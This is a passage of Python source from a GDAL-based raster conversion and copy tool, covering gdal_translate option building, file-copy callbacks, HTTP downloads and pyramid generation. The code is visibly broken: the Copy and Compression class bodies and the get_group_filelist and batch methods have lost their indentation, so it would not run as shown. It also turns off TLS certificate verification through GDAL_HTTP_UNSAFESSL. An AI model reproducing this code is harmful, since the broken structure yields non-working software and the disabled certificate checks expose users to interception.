                m_lerc_prec), '{}V2=ON'.format(' ' if m_lerc_prec else '') if m_comp == _LERC2 or m_comp == _LERC else ''))
    elif(m_comp == 'jpeg'):
        args.append('-co')
        args.append('QUALITY=%s' % (m_compression_quality))
    args.append('-co')
    args.append('INTERLEAVE=%s' % (m_interleave))
    args.append('-co')
    args.append('NOCOPY=True')
    if (m_pyramid):
        args.append('-co')
        args.append('UNIFORM_SCALE=%s' % (m_scale))
    args.append('-co')
    args.append('BLOCKSIZE=%s' % (m_bsize))
    args.append('-co')
    # let's fix the cache extension
    cache_source = user_data[0]
    isQuotes = cache_source[0] == '"' and cache_source[-1] == '"'
    quoteChar = '' if isQuotes else '"'
    args.append('CACHEDSOURCE={}{}{}'.format(
        quoteChar, cache_source, quoteChar))
    # ends
    return args
def copy_callback(file, src, dst):
    # Copy-progress callback: log the file name and approve the copy.
    Message(file)
    return True
def exclude_callback(file, src, dst):
    """Queue *file* in the global raster_buff when it matches the raster
    filter (or comes from an http source) instead of copying it.

    Returns True when the file was handled here (queued, or a .til file),
    False when the caller should treat it as a plain copy candidate.
    """
    if (file is None):
        return False
    # fix: removed an unused os.path.splitext(file) result that was never read.
    if (filterPaths(os.path.join(src, file), cfg.getValue(CCFG_RASTERS_NODE)) or
            src.lower().startswith('http')):
        if (file.lower().endswith(CTIL_EXTENSION_)):
            return True
        raster_buff.append({'f': file, 'src': '' if src ==
                            '/' else src, 'dst': dst if dst else ''})
        return True
    return False
def exclude_callback_for_meta(file, src, dst):
    """Metadata-pass variant of exclude_callback.

    fix: propagate the boolean result -- the previous version discarded it
    and always returned None, which reads as False to any caller that
    checks the outcome.
    """
    return exclude_callback(file, src, dst)
def getSourcePathUsingTempOutput(input):
    """Map a path under the -tempoutput folder back to its source entry in
    the global report (_rpt); returns None when resume/temp-output is off
    or no matching record exists.

    For known sidecar extensions the lookup falls back to the main raster
    record, so a sidecar failure can be attributed to its raster.
    """
    # cfg, _rpt are global vars.
    if (not _rpt or
            not getBooleanValue(cfg.getValue(CISTEMPOUTPUT))):
        return None
    relPath = input.replace(cfg.getValue(CTEMPOUTPUT, False), '')
    sidecarExts = ('.idx', '.lrc', '.pjg', '.pzp', '.pft', '.ppng', '.pjp', '.aux.xml')
    dotAt = relPath.rfind('.') if relPath.lower().endswith(sidecarExts) else -1
    if (dotAt == -1):
        # not a sidecar: look the path up directly under the report root.
        return _rpt.findExact('{}{}'.format(_rpt.root, relPath))
    stem = relPath[:dotAt + 1]
    for entry in _rpt:
        if (entry.find(stem) != -1 and
                any(entry.endswith(ext) for ext in cfg.getValue(CCFG_RASTERS_NODE))):
            return entry
    return None
def setUploadRecordStatus(input, rpt_status):
    """Mark the upload status of *input* in the global report.

    Returns True when the source entry was found and updated, else False.
    """
    sourcePath = getSourcePathUsingTempOutput(input)
    return bool(sourcePath and
                _rpt.updateRecordStatus(sourcePath, CRPT_UPLOADED, rpt_status))
def filterPaths(file, patterns):
    """Return True when *file* matches any of the fnmatch *patterns*.

    A pattern that does not begin with a wildcard character ('?', '*',
    '[') is treated as a suffix: a leading '*' is prepended so it matches
    the end of the path (e.g. '.tif' behaves like '*.tif').
    """
    global cfg
    if (not file and
            not cfg):
        print('Internal/Empty args/filterPaths()')
        return False
    if (not patterns):
        return False
    for rawPattern in patterns:
        pattern = rawPattern
        if (pattern[0] not in ('?', '*', '[')):
            pattern = '*' + pattern  # force to match the ending.
        if (fnmatch.fnmatchcase(file, pattern)):
            return True
    return False
class Copy:
def __init__(self, base=None):
    # (base) is the shared helper used for message routing; optional --
    # message() falls back to stdout when it is absent.
    self._base = base
def init(self, src, dst, copy_list, cb_list, user_config=None):
    """Prepare a local copy operation from *src* to *dst*.

    src may be a folder, or an existing report/file-list whose root then
    becomes the effective source. copy_list/cb_list configure what gets
    copied and which callbacks run. Returns True on success.
    """
    if (not dst or
            not src):
        return False
    normalizedSrc = src.replace('\\', '/')
    self.src = normalizedSrc
    self._input_flist = None
    if (not os.path.isdir(normalizedSrc)):
        # a non-folder source must be an existing report/file-list.
        if (not os.path.exists(normalizedSrc)):
            self.message(
                'Invalid -input report file ({})'.format(normalizedSrc), const_critical_text)
            return False
        self._input_flist = normalizedSrc
        try:
            global _rpt
            self.src = _rpt.root
        except Exception as e:
            self.message('Report ({})'.format(str(e)), const_critical_text)
            return False
    if (not self.src.endswith('/')):
        self.src += '/'
    self.dst = dst.replace('\\', '/')
    if (not self.dst.endswith('/')):
        self.dst += '/'
    self.format = copy_list
    self.cb_list = cb_list
    self.m_user_config = None
    self.__m_include_subs = True
    if (user_config):
        self.m_user_config = user_config
        include_subs = self.m_user_config.getValue('IncludeSubdirectories')
        # if there's a value either (!None), take it else defaults to (True)
        if (include_subs is not None):
            self.__m_include_subs = getBooleanValue(include_subs)
    return True
def message(self, msg, msgType=None):
    """Route *msg* through the Base message handler when one was supplied;
    otherwise fall back to printing it on stdout."""
    if (not self._base):
        print(msg)
        return None
    return self._base.message(msg, msgType)
def processs(self, post_processing_callback=None, post_processing_callback_args=None, pre_processing_callback=None):
    """Walk the input (folder, or report file list when -input was a report)
    and copy non-raster/auxiliary files to the destination.

    pre_processing_callback(src, dst, cfg) may veto a copy; the 'exclude'
    and 'copy' entries in self.cb_list can redirect or veto individual files;
    post_processing_callback(dst, args) runs after each copy. HTTP inputs are
    downloaded locally inside the 'exclude' handling. Always returns True;
    per-file failures are logged and recorded in the global report (_rpt).
    """
    log = None
    if (self._base):
        log = self._base.getMessageHandler
    if (log):
        log.CreateCategory('Copy')
    self.message('Copying non rasters/aux files (%s=>%s)..' %
                 (self.src, self.dst))
    # init - TIL files
    # First pass: register (.til) files so their member rasters are known
    # before the copy pass below.
    is_link = self._input_flist is not None
    if (til):
        for r, d, f in _rpt.walk() if is_link else os.walk(self.src):
            for file in f:
                if (not file):
                    continue
                if (not self.__m_include_subs):
                    # note: first arg to walk (self.src) has a trailing '/'
                    if ((r[:-1] if r[-1:] == '/' else r) != os.path.dirname(self.src)):
                        continue
                if (file.lower().endswith(CTIL_EXTENSION_)):
                    _til_filename = os.path.join(r, file)
                    if (til):
                        til.addTIL(_til_filename)
        for _til in til:
            til.process(_til)
    # ends
    # Second pass: the actual copy.
    for r, d, f in _rpt.walk() if is_link else os.walk(self.src):
        for file in f:
            if (not file):
                continue
            if (not self.__m_include_subs):
                # note: first arg to walk (self.src) has a trailing '/'
                if ((r[:-1] if r[-1:] == '/' else r) != os.path.dirname(self.src)):
                    continue
            free_pass = False
            dst_path = r.replace(self.src, self.dst)
            # '*' in the copy list means copy everything without extension checks.
            if (('*' in self.format['copy'])):
                free_pass = True
            if (not free_pass):
                _isCpy = False
                for _p in self.format['copy']:
                    if (file.endswith(_p)):
                        _isCpy = True
                        break
                if (not _isCpy):
                    continue
            isInputWebAPI = isInputHttp = False
            if (_rpt and
                    _rpt._isInputHTTP):
                isInputHttp = True
                # NOTE(review): (f, e) rebinds the walk() file-list variable; the
                # in-progress iteration over the original list object is unaffected.
                (f, e) = os.path.splitext(file)
                # if no file extension at the end of URL, it's assumed we're talking to a web service endpoint which in turn returns a raster.
                if (not e):
                    isInputWebAPI = True
            isPlanet = self.src.find(CPLANET_IDENTIFY) != -1
            if (filterPaths(os.path.join(r, file), self.format['exclude']) and
                    # skip 'exclude' list items and always copy (.til) files to destination.
                    not file.lower().endswith(CTIL_EXTENSION_) or
                    isInputWebAPI or
                    isPlanet or
                    isInputHttp):
                # Excluded (usually raster) files are handed to the 'exclude'
                # callback (e.g. to queue for conversion) and never copied here.
                if (('exclude' in self.cb_list)):
                    if (self.cb_list['exclude'] is not None):
                        if (self.m_user_config is not None):
                            if (getBooleanValue(self.m_user_config.getValue(CISTEMPOUTPUT))):
                                # no checks on temp-output validty done here. It's assumed it has been prechecked at the time of its assignment.
                                dst_path = r.replace(
                                    self.src, self.m_user_config.getValue(CTEMPOUTPUT, False))
                        _r = r
                        if (self.m_user_config):
                            if (self.m_user_config.getValue(CLOAD_RESTORE_POINT)):
                                if (getBooleanValue(self.m_user_config.getValue(CISTEMPINPUT))):
                                    r = r.replace(
                                        self.src, self.m_user_config.getValue(CTEMPINPUT, False))
                        if (_rpt and
                                _rpt._isInputHTTP and
                                (Report.CHDR_MODE in _rpt._header and
                                 _rpt._header[Report.CHDR_MODE] != 'cachingmrf' and
                                 _rpt._header[Report.CHDR_MODE] != 'rasterproxy')):
                            # HTTP input: download the remote file locally first.
                            _mkRemoteURL = os.path.join(_r, file)
                            try:
                                file_url = urlopen(
                                    _mkRemoteURL if not isInputWebAPI else os.path.splitext(_mkRemoteURL)[0])
                                respHeaders = []
                                if (sys.version_info[0] < 3):
                                    respHeaders = file_url.headers.headers
                                else:
                                    for hdr in file_url.getheaders():
                                        respHeaders.append(
                                            '{}: {}'.format(hdr[0], hdr[1]))
                                # Derive the true file name from the response headers when available.
                                isFileNameInHeader = False
                                for v in respHeaders:
                                    if (v.startswith('Content-Disposition')):
                                        token = 'filename='
                                        if (isPlanet):
                                            if (_mkRemoteURL in _rpt._input_list_info):
                                                _rpt._input_list_info[_mkRemoteURL][Report.CRPT_URL_TRUENAME] = v.split(':')[1].strip()
                                            isFileNameInHeader = True
                                            if (v.find(token) == -1):
                                                break
                                        f = v.find(token)
                                        if (f != -1):
                                            e = v.find('\r', f + len(token))
                                            if (_mkRemoteURL in _rpt._input_list_info):
                                                _rpt._input_list_info[_mkRemoteURL][Report.CRPT_URL_TRUENAME] = v[f + len(token): e].strip().replace('"', '').replace('?', '_')
                                            isFileNameInHeader = True
                                            break
                                    # aws pre-signed URL support.
                                    elif (v.startswith('x-amz-request-id')):
                                        if (_mkRemoteURL in _rpt._input_list_info):
                                            _rpt._input_list_info[_mkRemoteURL][Report.CRPT_URL_TRUENAME] = file.split('?')[0]
                                        isFileNameInHeader = True
                                localPath = self.m_user_config.getValue(
                                    CTEMPINPUT)
                                if (localPath is None):
                                    if (self.m_user_config.getValue(COP) == COP_COPYONLY):
                                        localPath = self.m_user_config.getValue(
                                            CCFG_PRIVATE_OUTPUT)
                                # we've to download the file first and save to the name requested.
                                if (localPath):
                                    r = r.replace(self.src, localPath)
                                    if (not os.path.exists(r)):
                                        makedirs(r)
                                    file = _rpt._input_list_info[_mkRemoteURL][
                                        Report.CRPT_URL_TRUENAME] if isFileNameInHeader else file
                                    self._base.message(
                                        '{}'.format(file_url.geturl()))
                                    with open(os.path.join(r, file), 'wb') as fp:
                                        buff = 4 * 1024 * 1024  # 4 MB chunks.
                                        while True:
                                            chunk = file_url.read(buff)
                                            if (not chunk):
                                                break
                                            fp.write(chunk)
                                    # mark download/copy status
                                    if (_rpt):
                                        _rpt.updateRecordStatus(
                                            _mkRemoteURL, CRPT_COPIED, CRPT_YES)
                                    # ends
                            except Exception as e:
                                self._base.message('{}'.format(
                                    str(e)), self._base.const_critical_text)
                        # skip fruther processing if 'false' returned from the callback fnc
                        if (not self.cb_list['exclude'](file, r, dst_path)):
                            continue
                continue
            try:
                if (('copy' in self.cb_list)):
                    if (self.cb_list['copy'] is not None):
                        # skip fruther processing if 'false' returned
                        if (not self.cb_list['copy'](file, r, dst_path)):
                            continue
                # do not create folders for op==reporting only.
                if (not g_is_generate_report):
                    if (not os.path.exists(dst_path)):
                        if (not self._base._isRasterProxyFormat('csv')):
                            makedirs(dst_path)
                dst_file = os.path.join(dst_path, file)
                src_file = os.path.join(r, file)
                do_post_processing_cb = do_copy = True
                if (os.path.dirname(src_file.replace('\\', '/')) != os.path.dirname(dst_path.replace('\\', '/')) or
                        g_is_generate_report):
                    if (pre_processing_callback):
                        do_post_processing_cb = do_copy = pre_processing_callback(
                            src_file, dst_file, self.m_user_config)
                    if (do_copy):
                        if (self.m_user_config.getValue(CLOAD_RESTORE_POINT)):
                            # Resume support: skip files already copied/uploaded per the report.
                            if (_rpt.getRecordStatus(src_file, CRPT_COPIED) == CRPT_YES or
                                    (getBooleanValue(self.m_user_config.getValue(CCLOUD_UPLOAD)) and
                                     _rpt.getRecordStatus(src_file, CRPT_UPLOADED) == CRPT_YES) or
                                    _rpt.operation == COP_UPL):
                                do_copy = False
                        if (do_copy):
                            primaryRaster = _rpt._m_rasterAssociates.findPrimaryExtension(
                                src_file)
                            if (primaryRaster):
                                _ext = _rpt._m_rasterAssociates.findExtension(
                                    src_file)
                                if (_ext):
                                    _mkPrimaryRaster = '{}{}'.format(
                                        src_file[:len(src_file) - len(_ext)], primaryRaster)
                                    if (_mkPrimaryRaster in _rpt._input_list_info):
                                        if (CTEMPINPUT in _rpt._header):
                                            dst_file = dst_file.replace(
                                                _rpt._header[CRESUME_HDR_OUTPUT], _rpt._header[CTEMPINPUT])
                            dst_file = self._base.renameMetaFileToMatchRasterExtension(
                                dst_file)
                            if (not self._base._isRasterProxyFormat('csv')):
                                shutil.copyfile(src_file, dst_file)
                            # Clone folder will get all the metadata files by default.
                            # do not copy raster associated files to clone path.
                            if (not primaryRaster):
                                self._base.copyMetadataToClonePath(
                                    dst_file)
                        # ends
                        if (self._input_flist):
                            _rpt.updateRecordStatus(
                                src_file, CRPT_COPIED, CRPT_YES)
                        self.message('{} {}'.format(
                            CRESUME_MSG_PREFIX if not do_copy else '[CPY]', src_file.replace(self.src, '')))
                    # copy post-processing
                    if (do_post_processing_cb):
                        if (post_processing_callback):
                            # ignore errors from the callback
                            ret = post_processing_callback(
                                dst_file, post_processing_callback_args)
                    # ends
            except Exception as e:
                if (self._input_flist):
                    _rpt.updateRecordStatus(os.path.join(
                        r, file), CRPT_COPIED, CRPT_NO)
                self.message('(%s)' %
                             (str(e)), self._base.const_critical_text)
                continue
    self.message('Done.')
    if (log):
        log.CloseCategory()
    return True
def get_group_filelist(self, input_source): # static
m_input_source = input_source.replace('\\', '/')
input_path = os.path.dirname(m_input_source)
file_buff = []
(p, e) = os.path.splitext(m_input_source)
for r, d, f in os.walk(input_path):
for file in f:
mk_path = os.path.join(r, file).replace('\\', '/')
if (mk_path.startswith(p)):
file_buff.append(mk_path)
return file_buff
def batch(self, file_lst, args=None, pre_copy_callback=None):
files_len = len(file_lst)
batch = 1
s = 0
while True:
m = s + batch
if (m >= files_len):
m = files_len
for i in range(s, m):
req = file_lst[i]
(input_file, output_file) = getInputOutput(
req['src'], req['dst'], req['f'], False)
dst_path = os.path.dirname(output_file)
if (not os.path.exists(dst_path)):
makedirs(dst_path)
CCOPY = 0
CMOVE = 1
mode_ = CCOPY # 0 = copy, 1 = move
if (args is not None):
if (isinstance(args, dict)):
if (('mode' in args)):
if (args['mode'].lower() == 'move'):
mode_ = CMOVE
if (mode_ == CCOPY):
self.message('[CPY] %s' % (output_file))
shutil.copyfile(input_file, output_file)
elif (mode_ == CMOVE):
self.message('[MV] %s' % (output_file))
try:
shutil.move(input_file, output_file)
except Exception as e:
self.message(str(e))
s = m
if s == files_len or s == 0:
break
return True
class Compression(object):
def __init__(self, gdal_path, base):
    """Drives the GDAL command-line tools (translate/addo/buildvrt) used for conversion."""
    self._base = base
    self.m_gdal_path = gdal_path
    self.m_id = None
    self.m_user_config = None
    # Executable names; init() appends the platform suffix (CEXEEXT) on Windows.
    self.CGDAL_TRANSLATE_EXE = 'gdal_translate'
    self.CGDAL_BUILDVRT_EXE = 'gdalbuildvrt'
    self.CGDAL_ADDO_EXE = 'gdaladdo'
def init(self, id=None):
    """Validate the Base instance, locate the GDAL binaries and set up the
    GDAL environment variables. Returns True on success, False otherwise.

    id, when given, tags log messages with the worker/job id.
    """
    if (id):
        self.m_id = id
    if (not self._base or
            not isinstance(self._base, Base) or
            not isinstance(self._base.getUserConfiguration, Config)):
        Message(
            'Err/Internal. (Compression) instance is not initialized with a valid (Base) instance.', const_critical_text)
        return False
    if (not self._base.isLinux()):
        # Windows builds carry an executable extension.
        self.CGDAL_TRANSLATE_EXE += CEXEEXT
        self.CGDAL_ADDO_EXE += CEXEEXT
        self.CGDAL_BUILDVRT_EXE += CEXEEXT
    self.m_user_config = self._base.getUserConfiguration
    if (CDISABLE_GDAL_CHECK):
        # forced failure if the env OR_DISABLE_GDAL was set to True but a GDAL conversion template was used.
        self.m_gdal_path = 'z:/'
        return True
    # internal gdal_path could get modified here.
    if (not self.m_gdal_path or
            not os.path.isdir(self.m_gdal_path)):
        if (self.m_gdal_path):
            self.message('Invalid GDAL path ({}) in parameter file. Using default location.'.format(
                self.m_gdal_path), const_warning_text)
        # Fall back to the GDAL/bin folder shipped next to this script.
        self.m_gdal_path = os.path.join(os.path.dirname(
            os.path.abspath(__file__)), r'GDAL/bin')
        if (not os.path.isdir(self.m_gdal_path)):
            self.message('GDAL not found at ({}).'.format(
                self.m_gdal_path), self._base.const_critical_text)
            return False
        self.m_user_config.setValue(CCFG_GDAL_PATH, self.m_gdal_path)
    # ends
    # set gdal_data enviornment path
    rootGdal = os.path.dirname(self.m_gdal_path)
    os.environ['GDAL_DATA'] = os.path.join(rootGdal, 'data')
    # disable CURL SSL certificate problem
    os.environ['GDAL_HTTP_UNSAFESSL'] = 'true'
    os.environ['LD_LIBRARY_PATH'] = os.path.join(rootGdal, 'lib')
    # ends
    msg_text = '(%s) is not found at (%s)'
    _gdal_translate = os.path.join(
        self.m_gdal_path, self.CGDAL_TRANSLATE_EXE)
    if (not os.path.isfile(_gdal_translate)):
        self.message(msg_text % (self.CGDAL_TRANSLATE_EXE,
                                 self.m_gdal_path), self._base.const_critical_text)
        return False
    if (CRUN_IN_AWSLAMBDA):
        # Lambda can only execute binaries from /tmp.
        if (not self._base.copyBinaryToTmp(_gdal_translate, '/tmp/{}'.format(self.CGDAL_TRANSLATE_EXE))):
            return False
    _gdaladdo = os.path.join(self.m_gdal_path, self.CGDAL_ADDO_EXE)
    if (not os.path.isfile(_gdaladdo)):
        self.message(msg_text % (self.CGDAL_ADDO_EXE,
                                 self.m_gdal_path), self._base.const_critical_text)
        return False
    if (CRUN_IN_AWSLAMBDA):
        if (not self._base.copyBinaryToTmp(_gdaladdo, '/tmp/{}'.format(self.CGDAL_ADDO_EXE))):
            return False
        # copy shared so binaries. Note> libcurl.so.4 support is installed on Lambda by default.
        if (not self._lambdaCopySharedSO('libgdal.so.20')):
            return False
    return True
def _lambdaCopySharedSO(self, sharedLib):
    """Copy a shared library from the GDAL folder into /var/task (AWS Lambda).

    sharedLib -- file name of the .so to copy (e.g. 'libgdal.so.20').
    Returns True on success, False on failure.
    """
    try:
        self.message('# pre-sudo {}'.format(sharedLib))
        _so = os.path.join(self.m_gdal_path, sharedLib)
        p = subprocess.Popen(
            ' '.join(['sudo', 'cp', _so, '/var/task']), shell=True)
        # Bug fix: the copy was previously fired off without waiting, so the
        # caller could proceed before the .so was in place and a failed 'cp'
        # went unnoticed. Wait for completion and check the exit status.
        p.wait()
        if (p.returncode != 0):
            self.message('Err. lambda>cp failed ({})'.format(p.returncode))
            return False
        self.message('# post-sudo {}'.format(sharedLib))
    except Exception as e:
        self.message('Err. lambda>{}'.format(str(e)))
        return False
    return True
def message(self, msg, status=const_general_text):
    """Relay msg to the Base handler; prefix the worker thread name when a job id is set."""
    text = '[{}] {}'.format(threading.current_thread().name, msg) if self.m_id else msg
    self._base.message(text, status)
    return True
def buildMultibandVRT(self, input_files, output_file):
    """Build a multiband VRT at output_file from input_files via gdalbuildvrt.

    Returns False immediately when input_files is empty, otherwise the
    result of the external gdalbuildvrt call.
    """
    if (not input_files):
        return False
    args = [os.path.join(self.m_gdal_path, self.CGDAL_BUILDVRT_EXE), output_file]
    args.extend(input_files)
    self.message('Creating VRT output file (%s)' % (output_file))
    return self._call_external(args)
def compress(self, input_file, output_file, args_callback=None, build_pyramids=True, post_processing_callback=None, post_processing_callback_args=None, **kwargs):
    """Convert input_file to output_file with gdal_translate, optionally
    building pyramids, generating a second-pass cloud-optimized GeoTIFF,
    auto-creating raster proxy files and running a post-processing callback
    (typically the cloud upload).

    args_callback(args, [...]) may supply the gdal_translate arguments.
    Recognized kwargs: 'name' (timing label), UpdateOrjobStatus=False marks
    a recursive raster-proxy call, createOverviews/recursiveCall flags.
    Returns True on success; failures are recorded in the global report (_rpt).
    """
    isRasterProxyCaller = False
    if (UpdateOrjobStatus in kwargs):
        if (not kwargs[UpdateOrjobStatus]):
            isRasterProxyCaller = True
    if (_rpt):
        # Honor the true remote file name captured earlier from HTTP headers.
        if (input_file in _rpt._input_list_info and
                Report.CRPT_URL_TRUENAME in _rpt._input_list_info[input_file]):
            output_file = '{}/{}'.format(os.path.dirname(
                output_file), _rpt._input_list_info[input_file][Report.CRPT_URL_TRUENAME])
    _vsicurl_input = self.m_user_config.getValue(CIN_S3_PREFIX, False)
    _input_file = input_file.replace(
        _vsicurl_input, '') if _vsicurl_input else input_file
    isTempInput = self._base.getBooleanValue(
        self.m_user_config.getValue(CISTEMPINPUT))
    if (isTempInput):
        if (_rpt):
            if (not _rpt._isInputHTTP):
                # Map the temp-input path back to the report root for record keeping.
                _input_file = _input_file.replace(self.m_user_config.getValue(
                    CTEMPINPUT, False), '' if _rpt.root == '/' else _rpt.root)
    _do_process = ret = True
    # get restore point snapshot
    if (self.m_user_config.getValue(CLOAD_RESTORE_POINT)):
        _get_rstr_val = _rpt.getRecordStatus(_input_file, CRPT_PROCESSED)
        if (_get_rstr_val == CRPT_YES or
                _rpt.operation == COP_UPL):
            if (_rpt.operation != COP_UPL):
                self.message('{} {}'.format(
                    CRESUME_MSG_PREFIX, _input_file))
            _do_process = False
    # ends
    # ESRI GRID (.adf) inputs: name the output after the containing folder.
    breakInputPath = input_file.split('/')
    if (breakInputPath[-1].lower().endswith('.adf')):
        breakOututPath = output_file.split('/')
        breakInputPath.pop()
        breakOututPath.pop()
        if (breakInputPath[-1] == breakOututPath[-1]):
            breakOututPath.pop()
        output_file = '/'.join(breakOututPath) + '/{}.{}'.format(
            breakInputPath[-1], self.m_user_config.getValue('Mode').split('_')[0])
    post_process_output = output_file
    if (_do_process):
        out_dir_path = os.path.dirname(output_file)
        if (not os.path.exists(out_dir_path)):
            try:
                # let's try to make the output dir-tree else GDAL would fail
                makedirs(os.path.dirname(output_file))
            except Exception as exp:
                # let's try to sleep for few seconds and see if any other thread has created it.
                time.sleep(2)
                if (not os.path.exists(out_dir_path)):
                    self.message('(%s)' %
                                 str(exp), self._base.const_critical_text)
                    if (_rpt):
                        _rpt.updateRecordStatus(
                            _input_file, CRPT_PROCESSED, CRPT_NO)
                    return False
        # ends
        isModeClone = self.m_user_config.getValue('Mode') == 'clonemrf'
        do_process = (_rpt and _rpt.operation !=
                      COP_NOCONVERT) and not isModeClone
        if (not do_process):
            # No conversion: plain copy (or download for /vsicurl/ inputs).
            self.message('[CPY] {}'.format(_input_file))
            if (input_file.startswith('/vsicurl/')):
                try:
                    _dn_vsicurl_ = input_file.split('/vsicurl/')[1]
                    file_url = urlopen(_dn_vsicurl_)
                    validateForClone = isModeClone
                    with open(output_file, 'wb') as fp:
                        buff = 4 * 1024 * 1024
                        while True:
                            chunk = file_url.read(buff)
                            if (validateForClone):
                                # First chunk must open with the MRF root element.
                                validateForClone = False
                                if (chunk[:CMRF_DOC_ROOT_LEN] != '<{}>'.format(CMRF_DOC_ROOT)):
                                    self.message('Invalid MRF ({})'.format(
                                        _dn_vsicurl_), self._base.const_critical_text)
                                    raise Exception
                            if (not chunk):
                                break
                            fp.write(chunk)
                except Exception as e:
                    if (_rpt):
                        _rpt.updateRecordStatus(
                            _input_file, CRPT_PROCESSED, CRPT_NO)
                    return False
            else:
                if (isTempInput or
                        not self._base.getBooleanValue(self.m_user_config.getValue('iss3'))):
                    shutil.copyfile(input_file, output_file)
            if (isModeClone):
                # Simulate the MRF file update (to include the CachedSource) which was earlier done via the GDAL_Translate->MRF driver.
                try:
                    _CDOC_ROOT = CMRF_DOC_ROOT
                    _CDOC_CACHED_SOURCE = 'CachedSource'
                    _CDOC_SOURCE = 'Source'
                    doc = minidom.parse(output_file)
                    nodeMeta = doc.getElementsByTagName(_CDOC_ROOT)
                    nodeRaster = doc.getElementsByTagName('Raster')
                    if (not nodeMeta or
                            not nodeRaster):
                        raise Exception()
                    cachedNode = doc.getElementsByTagName(
                        _CDOC_CACHED_SOURCE)
                    if (not cachedNode):
                        cachedNode.append(
                            doc.createElement(_CDOC_CACHED_SOURCE))
                    nodeSource = doc.getElementsByTagName(_CDOC_SOURCE)
                    if (not nodeSource):
                        nodeSource.append(doc.createElement(_CDOC_SOURCE))
                    if (nodeSource[0].hasChildNodes()):
                        nodeSource[0].removeChild(nodeSource[0].firstChild)
                    nodeSource[0].appendChild(
                        doc.createTextNode(input_file))
                    cachedNode[0].appendChild(nodeSource[0])
                    nodeMeta[0].insertBefore(cachedNode[0], nodeRaster[0])
                    with open(output_file, "w") as c:
                        # GDAL mrf driver can't handle XML entity names.
                        _mrfBody = doc.toxml().replace('&quot;', '"')
                        _indx = _mrfBody.find('<{}>'.format(_CDOC_ROOT))
                        if (_indx == -1):
                            raise Exception()
                        _mrfBody = _mrfBody[_indx:]
                        c.write(_mrfBody)
                except BaseException:
                    self.message('Invalid MRF ({})'.format(
                        input_file), self._base.const_critical_text)
                    if (_rpt):
                        _rpt.updateRecordStatus(
                            _input_file, CRPT_PROCESSED, CRPT_NO)
                    return False
            # ends
        do_pyramids = self.m_user_config.getValue('Pyramids')
        timeIt = kwargs['name'] if 'name' in kwargs else None
        azSAS = self.m_user_config.getValue(CFGAZSAS, False)
        bUnicode = False
        try:
            _ = input_file.encode('ascii')
        except UnicodeEncodeError as e:
            bUnicode = True
        inputRaster = self._base.urlEncode(input_file) if _vsicurl_input and input_file.find(
            CPLANET_IDENTIFY) == -1 and not azSAS and not isTempInput and not bUnicode else '"{}"'.format(input_file)
        useTokenPath = self._base.convertToTokenPath(inputRaster)
        if (useTokenPath is not None):
            inputRaster = useTokenPath
        if (do_pyramids != CCMD_PYRAMIDS_ONLY and
                do_process):
            # gdal_translate conversion pass.
            args = [os.path.join(
                self.m_gdal_path, self.CGDAL_TRANSLATE_EXE)]
            if (args_callback is None):  # defaults
                args.append('-of')
                args.append('MRF')
                args.append('-co')
                args.append('COMPRESS=LERC')
                args.append('-co')
                args.append('BLOCKSIZE=512')
            else:
                # callback user function to get arguments.
                args = args_callback(args, [
                    inputRaster if useTokenPath else input_file, output_file, self.m_user_config, self._base])
            if (_rpt):
                if (input_file.startswith('/vsicurl/')):
                    trueFile = input_file.replace('/vsicurl/', '')
                    if (trueFile in _rpt._input_list_info and
                            Report.CRPT_URL_TRUENAME in _rpt._input_list_info[trueFile]):
                        (urlFileName, urlExt) = os.path.splitext(os.path.join(output_file.split(
                            '?')[0], _rpt._input_list_info[trueFile][Report.CRPT_URL_TRUENAME]))
                        if (not self._base.getBooleanValue(self.m_user_config.getValue('KeepExtension')) and
                                args[1] == '-of'):
                            urlExt = args[2]
                        post_process_output = output_file = '{}{}{}'.format(
                            urlFileName, '' if urlExt.startswith('.') else '.', urlExt)
                        try:
                            createPath = os.path.dirname(output_file)
                            if (not os.path.exists(createPath)):
                                makedirs(createPath)
                        except Exception as e:
                            self.message(
                                str(e), self._base.const_critical_text)
            args.append(inputRaster)
            useCOGTIFF = self.m_user_config.getValue('cog') == True
            if (useCOGTIFF):
                # First pass writes to a temp name; the COG pass below strips it.
                output_file += CloudOGTIFFExt
            useVsimem = self._base.getBooleanValue(
                self.m_user_config.getValue('vsimem'))
            args.append('"{}{}"'.format(
                '/vsimem/' if useVsimem else '', output_file))
            self.message('Converting (%s)..' %
                         (useTokenPath if useTokenPath else input_file))
            ret = self._call_external(
                args, name=timeIt, method=TimeIt.Conversion, store=self._base)
            lstMsg = self._base._lastMsg
            if (isinstance(lstMsg, bytes)):  # external msgs could be non-unicode.
                lstMsg = lstMsg.decode(encoding='utf-8')
            isAwsTokenExpired = lstMsg.find('The provided token has expired') != -1
            if (isAwsTokenExpired):
                # Refresh the IAM role credentials and retry once.
                store = S3Storage(self._base)
                self.message('Refreshing token/direct access..')
                roleInfo = store.getIamRoleInfo()
                os.environ['AWS_ACCESS_KEY_ID'] = roleInfo[store.RoleAccessKeyId]
                os.environ['AWS_SECRET_ACCESS_KEY'] = roleInfo[store.RoleSecretAccessKey]
                os.environ['AWS_SESSION_TOKEN'] = roleInfo[store.RoleToken]
                print('Retry/External call..')
                ret = self._call_external(
                    args, name=timeIt, method=TimeIt.Conversion, store=self._base)
            self.message('Status: (%s).' % ('OK' if ret else 'FAILED'))
            if (not ret):
                if (_rpt):
                    _rpt.updateRecordStatus(
                        _input_file, CRPT_PROCESSED, CRPT_NO)
                return ret
        # build pyramids is always turned off for rasters that belong to (.til) files.
        if (build_pyramids):
            if (self._base.getBooleanValue(do_pyramids) or  # accept any valid boolean value.
                    do_pyramids == CCMD_PYRAMIDS_ONLY or
                    do_pyramids == CCMD_PYRAMIDS_EXTERNAL):
                iss3 = self.m_user_config.getValue('iss3')
                if (iss3 and do_pyramids == CCMD_PYRAMIDS_ONLY):
                    if (do_pyramids != CCMD_PYRAMIDS_ONLY):  # s3->(local)->.ovr
                        input_file = output_file
                    # work on a temp vrt; the .ovr gets renamed back below.
                    output_file = output_file + '.__vrt__'
                    self.message('BuildVrt (%s=>%s)' %
                                 (input_file, output_file))
                    ret = self.buildMultibandVRT([input_file], output_file)
                    self.message('Status: (%s).' %
                                 ('OK' if ret else 'FAILED'))
                    if (not ret):
                        if (_rpt):
                            _rpt.updateRecordStatus(
                                _input_file, CRPT_PROCESSED, CRPT_NO)
                        # we can't proceed if vrt couldn't be built successfully.
                        return ret
                kwargs['source'] = timeIt  # input_file
                ret = self.createaOverview(
                    '"{}"'.format(output_file), **kwargs)
                self.message('Status: (%s).' % ('OK' if ret else 'FAILED'),
                             self._base.const_general_text if ret else self._base.const_critical_text)
                if (not ret):
                    if (_rpt):
                        _rpt.updateRecordStatus(
